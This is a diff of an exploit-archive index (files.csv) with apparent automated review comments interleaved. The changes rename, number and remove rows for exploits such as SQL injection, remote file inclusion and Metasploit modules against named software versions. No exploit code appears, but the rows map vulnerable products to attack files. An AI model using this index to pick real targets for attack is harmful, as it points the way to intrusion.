 30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 - 'TBLinf32.dll' ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote,0
 30491,platforms/multiple/remote/30491.java,"OWASP Stinger - Filter Bypass",2007-08-13,"Meder Kydyraliev",multiple,remote,0
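Review bot: Removing the 28480 row in the hunk at @@ -13732 (and likewise 16919 at @@ -11148, 30474 at @@ -13952 and 41693 at @@ -15409) retires those ids from the index, but this diff touches only files.csv, so whether the referenced files under platforms/ are deleted in the same commit cannot be seen here. If the files remain, the tree and the index disagree and anything that keys on this CSV will silently stop listing them; if the entries were folded into their "(1)" siblings, those sibling rows (not visible in this chunk) should lose their numbering suffix in the same change. The commit message should name the retired ids and the reason so the removal can be audited later.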
@@ -14984,13 +14964,13 @@ id,file,description,date,author,platform,type,port
 37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN - launchAgent.do return-To Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
 37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN - fileSystem.do Multiple Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
 37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free (Metasploit)",2015-07-08,Metasploit,multiple,remote,0
-37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (1)",2015-07-08,Metasploit,multiple,remote,0
+37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,multiple,remote,0
 37542,platforms/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0
 37576,platforms/linux/remote/37576.cpp,"Alligra Calligra - Heap Based Buffer Overflow",2012-08-07,"Charlie Miller",linux,remote,0
 37597,platforms/hardware/remote/37597.rb,"Accellion FTA - getStatus verify_oauth_token Command Execution (Metasploit)",2015-07-13,Metasploit,hardware,remote,443
 37598,platforms/multiple/remote/37598.rb,"VNC Keyboard - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,5900
 37599,platforms/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free (Metasploit)",2015-07-13,Metasploit,windows,remote,0
-37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (2)",2015-07-13,Metasploit,multiple,remote,617
+37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia < 11.0.12 - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,617
 37611,platforms/windows/remote/37611.php,"Impero Education Pro - System 
Remote Command Execution",2015-07-14,slipstream,windows,remote,0
 37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution (Metasploit)",2015-07-17,Metasploit,hardware,remote,0
 37647,platforms/multiple/remote/37647.txt,"Apache Struts 2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0
@@ -15409,7 +15389,6 @@ id,file,description,date,author,platform,type,port
 41684,platforms/multiple/remote/41684.rb,"GIT 1.8.5.6 / 1.9.5 / 2.0.5 / 2.1.4/ 2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)",2014-12-18,Metasploit,multiple,remote,0
 41689,platforms/multiple/remote/41689.rb,"Ruby on Rails 4.0.x / 4.1.x / 4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit)",2015-06-16,Metasploit,multiple,remote,0
 41690,platforms/multiple/remote/41690.rb,"Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-03-06,Metasploit,multiple,remote,0
-41693,platforms/multiple/remote/41693.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)",2003-03-07,Metasploit,multiple,remote,0
 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
@@ -17027,7 +17006,7 @@ id,file,description,date,author,platform,type,port
 2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0
 2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0
 2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0
-2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload with Code Execution",2006-10-14,Kacper,php,webapps,0
+2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,php,webapps,0
 2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,php,webapps,0
 2558,platforms/php/webapps/2558.txt,"Jinzora 2.6 - 'extras/mt.php' Remote File Inclusion",2006-10-14,ddoshomo,php,webapps,0
 2559,platforms/php/webapps/2559.txt,"CyberBrau 0.9.4 - 'forum/track.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0
@@ -18788,7 +18767,7 @@ id,file,description,date,author,platform,type,port
 5273,platforms/php/webapps/5273.txt,"Joomla! Component Acajoom 1.1.5 - SQL Injection",2008-03-18,fataku,php,webapps,0
 5274,platforms/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,asp,webapps,0
 5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' Parameter SQL Injection",2008-03-18,n3w7u,php,webapps,0
-5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection",2008-03-19,xcorpitx,asp,webapps,0
+5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (1)",2008-03-19,xcorpitx,asp,webapps,0
 5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0
 5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0
 5279,platforms/php/webapps/5279.txt,"Mambo Component Accombo 1.x - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0
@@ -19811,7 +19790,7 @@ id,file,description,date,author,platform,type,port
 6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0
 6587,platforms/php/webapps/6587.txt,"The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0
 6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection",2008-09-26,0x90,php,webapps,0
-6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' Parameter SQL Injection",2008-09-27,Crackers_Child,php,webapps,0
+6590,platforms/php/webapps/6590.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (2)",2008-09-27,Crackers_Child,php,webapps,0
 6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0
 6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion",2008-09-27,NoGe,php,webapps,0
 6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,php,webapps,0
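Review bot: After this rename 6590 is presented as entry "(2)" of the same ASPapp Knowledge Base 'CatId' SQL injection as 5276 (hunk @@ -18788), yet 6590 keeps the path `platforms/php/webapps/6590.txt` and platform `php` while 5276 sits under `asp`. If the platform column is derived from the file's directory this is a pre-existing misfiling rather than something the commit introduces, but pairing the two titles makes the mismatch visible and anyone filtering on platform will find only one of the pair. Either relocate the 6590 file and row to the asp platform in a follow-up, or record in the commit message why the two entries for one ASP product are filed under different platforms.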
@@ -20909,7 +20888,7 @@ id,file,description,date,author,platform,type,port
 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0
 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps,0
 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' Parameter SQL Injection",2009-02-13,JIKO,php,webapps,0
-8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-13,bd0rk,php,webapps,0
+8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion (c99)",2009-02-13,bd0rk,php,webapps,0
 8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,php,webapps,0
 8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - 'item' Parameter SQL Injection",2009-02-13,Osirys,php,webapps,0
 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0
@@ -21167,7 +21146,7 @@ id,file,description,date,author,platform,type,port
 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0
 8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - 'category' Parameter SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0
 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0
-8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php with' Local File Inclusion",2009-04-27,SirGod,php,webapps,0
+8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0
 8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0
 8551,platforms/php/webapps/8551.txt,"Teraway FileStream 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0
 8552,platforms/php/webapps/8552.txt,"Teraway LiveHelp 2.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0
@@ -23098,7 +23077,7 @@ id,file,description,date,author,platform,type,port
 12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
 12121,platforms/php/webapps/12121.txt,"Joomla! Component JA Voice 2.0 - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0
 12123,platforms/php/webapps/12123.txt,"Joomla! Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
-12124,platforms/php/webapps/12124.txt,"Joomla! Component huruhelpdesk - SQL Injection",2010-04-09,bumble_be,php,webapps,0
+12124,platforms/php/webapps/12124.txt,"Joomla! Component Huru Helpdesk - SQL Injection (1)",2010-04-09,bumble_be,php,webapps,0
 12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0
 12132,platforms/php/webapps/12132.pl,"Joomla! Component Agenda Address Book 1.0.1 - 'id' Parameter SQL Injection",2010-04-09,v3n0m,php,webapps,0
 12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0
@@ -23617,7 +23596,7 @@ id,file,description,date,author,platform,type,port
 13783,platforms/php/webapps/13783.txt,"GREEZLE - Global Real Estate Agent Site Auth SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
 13784,platforms/php/webapps/13784.txt,"HauntmAx CMS Haunted House - Directory Listing / SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
 13785,platforms/php/webapps/13785.txt,"eLms Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0
-13786,platforms/php/webapps/13786.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0
+13786,platforms/php/webapps/13786.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (1)",2010-06-09,Sid3^effects,php,webapps,0
 13788,platforms/asp/webapps/13788.txt,"Web Wiz Forums 9.68 - SQL Injection",2010-06-09,Sid3^effects,asp,webapps,0
 13789,platforms/asp/webapps/13789.txt,"Virtual Real Estate Manager 3.5 - SQL Injection",2010-06-09,Sid3^effects,asp,webapps,0
 14294,platforms/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion",2010-07-09,Li0n-PaL,php,webapps,0
@@ -24006,7 +23985,7 @@ id,file,description,date,author,platform,type,port
 14445,platforms/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0
 14446,platforms/php/webapps/14446.txt,"PhotoPost - PHP SQL Injection",2010-07-23,Cyber-sec,php,webapps,0
 14448,platforms/php/webapps/14448.txt,"Joomla! Component Golf Course Guide 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps,0
-14449,platforms/php/webapps/14449.txt,"Joomla! Component Huru Helpdesk - SQL Injection",2010-07-23,Amine_92,php,webapps,0
+14449,platforms/php/webapps/14449.txt,"Joomla! Component Huru Helpdesk - SQL Injection (2)",2010-07-23,Amine_92,php,webapps,0
 14450,platforms/php/webapps/14450.txt,"Joomla! Component com_iproperty - SQL Injection",2010-07-23,Amine_92,php,webapps,0
 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - 'ecard.php' SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0
@@ -25103,7 +25082,7 @@ id,file,description,date,author,platform,type,port
 17667,platforms/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0
 17673,platforms/php/webapps/17673.txt,"WordPress Plugin IP-Logger 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0
 17674,platforms/php/webapps/17674.txt,"Joomla! Component JoomTouch 1.0.2 - Local File Inclusion",2011-08-17,NoGe,php,webapps,0
-17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection",2011-08-17,v3n0m,php,webapps,0
+17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (1)",2011-08-17,v3n0m,php,webapps,0
 17677,platforms/php/webapps/17677.txt,"WordPress Plugin File Groups 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
 17678,platforms/php/webapps/17678.txt,"WordPress Plugin Contus HD FLV Player 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
 17679,platforms/php/webapps/17679.txt,"WordPress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
@@ -25408,7 +25387,7 @@ id,file,description,date,author,platform,type,port
 18322,platforms/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,php,webapps,0
 18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0
 18329,platforms/multiple/webapps/18329.txt,"Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0
-18330,platforms/php/webapps/18330.txt,"WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0
+18330,platforms/php/webapps/18330.txt,"WordPress Plugin Pay with Tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0
 18335,platforms/php/webapps/18335.txt,"MangosWeb - SQL Injection",2012-01-08,Hood3dRob1n,php,webapps,0
 18338,platforms/php/webapps/18338.txt,"phpMyDirectory.com 1.3.3 - SQL Injection",2012-01-08,Serseri,php,webapps,0
 18340,platforms/php/webapps/18340.txt,"Paddelberg Topsite Script - Authentication Bypass",2012-01-09,"Christian Inci",php,webapps,0
@@ -25580,7 +25559,7 @@ id,file,description,date,author,platform,type,port
 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0
 18728,platforms/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
 18729,platforms/php/webapps/18729.txt,"Joomla! Component 'com_bearleague' - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
-18732,platforms/php/webapps/18732.txt,"Software DEP Classified Script 2.5 - SQL Injection",2012-04-12,"hordcode security",php,webapps,0
+18732,platforms/php/webapps/18732.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (2)",2012-04-12,"hordcode security",php,webapps,0
 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0
 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,php,webapps,0
 18741,platforms/php/webapps/18741.txt,"Joomla! Component 'com_ponygallery' - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0
@@ -26539,8 +26518,8 @@ id,file,description,date,author,platform,type,port
 22885,platforms/asp/webapps/22885.asp,"QuadComm Q-Shop 2.5 - Failure To Validate Credentials",2003-07-09,G00db0y,asp,webapps,0
 22886,platforms/php/webapps/22886.txt,"ChangshinSoft EZTrans Server - download.php Directory Traversal",2003-07-09,"SSR Team",php,webapps,0
 22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 - 'Mainfile.php' Remote File Inclusion",2003-07-10,theblacksheep,php,webapps,0
-22888,platforms/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (1)",2003-07-10,"TioEuy & AresU",asp,webapps,0
-22889,platforms/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (2)",2003-07-10,"Bosen & TioEuy",asp,webapps,0
+22888,platforms/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (1)",2003-07-10,"TioEuy & AresU",asp,webapps,0
+22889,platforms/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (2)",2003-07-10,"Bosen & TioEuy",asp,webapps,0
 22895,platforms/asp/webapps/22895.txt,"ASP-DEV Discussion Forum 2.0 - Admin Directory Weak Default Permissions",2003-07-13,G00db0y,asp,webapps,0
 22896,platforms/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,php,webapps,0
 22901,platforms/php/webapps/22901.txt,"BlazeBoard 1.0 - Information Disclosure",2003-07-14,JackDaniels,php,webapps,0
@@ -26698,7 +26677,7 @@ id,file,description,date,author,platform,type,port
 23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin - 'newreply.php' SQL Injection",2012-12-13,JoinSe7en,php,webapps,0
 23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3 < 2.3.9-4 - Blind SQL Injection",2012-12-13,modpr0be,php,webapps,0
 23363,platforms/php/webapps/23363.txt,"phpBB 2.0.x - profile.php SQL Injection",2003-11-08,JOCANOR,php,webapps,0
-23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 - Denial of Servicee.pl Remote Command Execution",2003-11-10,Don_Huan,cgi,webapps,0
+23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 - 'dose.pl' Remote Command Execution",2003-11-10,Don_Huan,cgi,webapps,0
 23370,platforms/cgi/webapps/23370.txt,"ncube server manager 1.0 - Directory Traversal",2003-11-10,"Beck Mr.R",cgi,webapps,0
 23372,platforms/php/webapps/23372.txt,"PHP-Coolfile 1.4 - Unauthorized Administrative Access",2003-11-11,r00t@rsteam.ru,php,webapps,0
 23381,platforms/php/webapps/23381.txt,"PHPWebFileManager 2.0 - 'index.php' Directory Traversal",2003-11-17,"RusH security team",php,webapps,0
@@ -27589,8 +27568,8 @@ id,file,description,date,author,platform,type,port
 25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 - Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0
 25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 - AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0
 25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
-25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
-25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - PoC.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
+25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php' phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
+25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 - ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
 25230,platforms/php/webapps/25230.txt,"PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities",2005-03-16,"benji lemien",php,webapps,0
 25232,platforms/php/webapps/25232.txt,"McNews 1.x - install.php Arbitrary File Inclusion",2005-03-17,"Jonathan Whiteley",php,webapps,0
@@ -30369,7 +30348,7 @@ id,file,description,date,author,platform,type,port
 28956,platforms/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80
 28959,platforms/php/webapps/28959.txt,"WordPress Plugin Cart66 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80
 28960,platforms/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80
-29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - 'articleId' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0
+29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - 'articleId' Parameter SQL Injection (1)",2006-11-18,"laurent gaffie",asp,webapps,0
 28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
@@ -30477,7 +30456,7 @@ id,file,description,date,author,platform,type,port
 29087,platforms/asp/webapps/29087.txt,"ActiveNews Manager - 'page' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0
 29088,platforms/asp/webapps/29088.txt,"ActiveNews Manager - 'query' Parameter Cross-Site Scripting",2006-11-18,"laurent gaffie",asp,webapps,0
 29089,platforms/asp/webapps/29089.txt,"Active News Manager - 'catID' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0
-29090,platforms/asp/webapps/29090.txt,"Active News Manager - 'articleId' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0
+29090,platforms/asp/webapps/29090.txt,"ActiveNews Manager - 'articleId' Parameter SQL Injection (2)",2006-11-18,"laurent gaffie",asp,webapps,0
 29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (Remote Code Execution)",2013-10-20,"Halim Cruzito",php,webapps,0
 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0
 29211,platforms/php/webapps/29211.txt,"WordPress Theme Curvo - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0
@@ -32856,7 +32835,7 @@ id,file,description,date,author,platform,type,port
 32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 - 'tiki-listpages.php' Cross-Site Scripting",2009-03-12,iliz,php,webapps,0
 32887,platforms/php/webapps/32887.txt,"osCommerce 2.2/3.0 - 'oscid' Session Fixation",2009-04-02,laurent.desaulniers,php,webapps,0
 32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 - 'error' Parameter Cross-Site Scripting",2009-03-17,syniack,java,webapps,0
-32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0
+32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass (1)",2014-04-14,"Yassin Aboukir",hardware,webapps,0
 32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0
 32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 - 'command.shtml' Cross-Site Scripting",2009-03-31,"SCS team",java,webapps,0
 32863,platforms/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 - 'search.xml' Cross-Site Scripting",2009-05-20,"SCS team",java,webapps,0
@@ -33510,7 +33489,7 @@ id,file,description,date,author,platform,type,port
 34107,platforms/php/webapps/34107.txt,"BoastMachine 3.1 - 'key' Parameter Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0
 34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Parameter Cross-Site Scripting",2009-01-08,"Patrick Webster",java,webapps,0
 34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion",2010-06-03,"High-Tech Bridge SA",php,webapps,0
-34110,platforms/php/webapps/34110.txt,"PG Auto Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0
+34110,platforms/php/webapps/34110.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (2)",2010-06-09,Sid3^effects,php,webapps,0
 34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0
 34339,platforms/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
 34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0
@@ -36236,7 +36215,7 @@ id,file,description,date,author,platform,type,port
 38548,platforms/php/webapps/38548.txt,"Telaen - Information Disclosure",2013-06-03,"Manuel García Cárdenas",php,webapps,0
 38550,platforms/cgi/webapps/38550.txt,"QNAP VioStor NVR / QNAP NAS - Remote Code Execution",2013-06-05,"Tim Herres",cgi,webapps,0
 38551,platforms/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin - Velocity Template Injection",2015-10-28,"Chris Wood",java,webapps,0
-38553,platforms/hardware/webapps/38553.txt,"Sagem FAST3304-V2 - Authentication Bypass",2015-10-28,"Soufiane Alami Hassani",hardware,webapps,0
+38553,platforms/hardware/webapps/38553.txt,"Sagem FAST3304-V2 - Authentication Bypass (2)",2015-10-28,"Soufiane Alami Hassani",hardware,webapps,0
 38560,platforms/php/webapps/38560.txt,"Caucho Resin - '/resin-admin/' URI Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0
 38561,platforms/php/webapps/38561.txt,"Caucho Resin - 'index.php' logout Parameter Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0
 38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics - Remote Code Injection",2013-06-10,"Markus Wulftange",php,webapps,0
@@ -36799,7 +36778,7 @@ id,file,description,date,author,platform,type,port
 39798,platforms/hardware/webapps/39798.txt,"Multiple JVC HDRs and Net Cameras - Multiple Vulnerabilities",2016-05-10,Orwelllabs,hardware,webapps,80
 39806,platforms/php/webapps/39806.txt,"WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
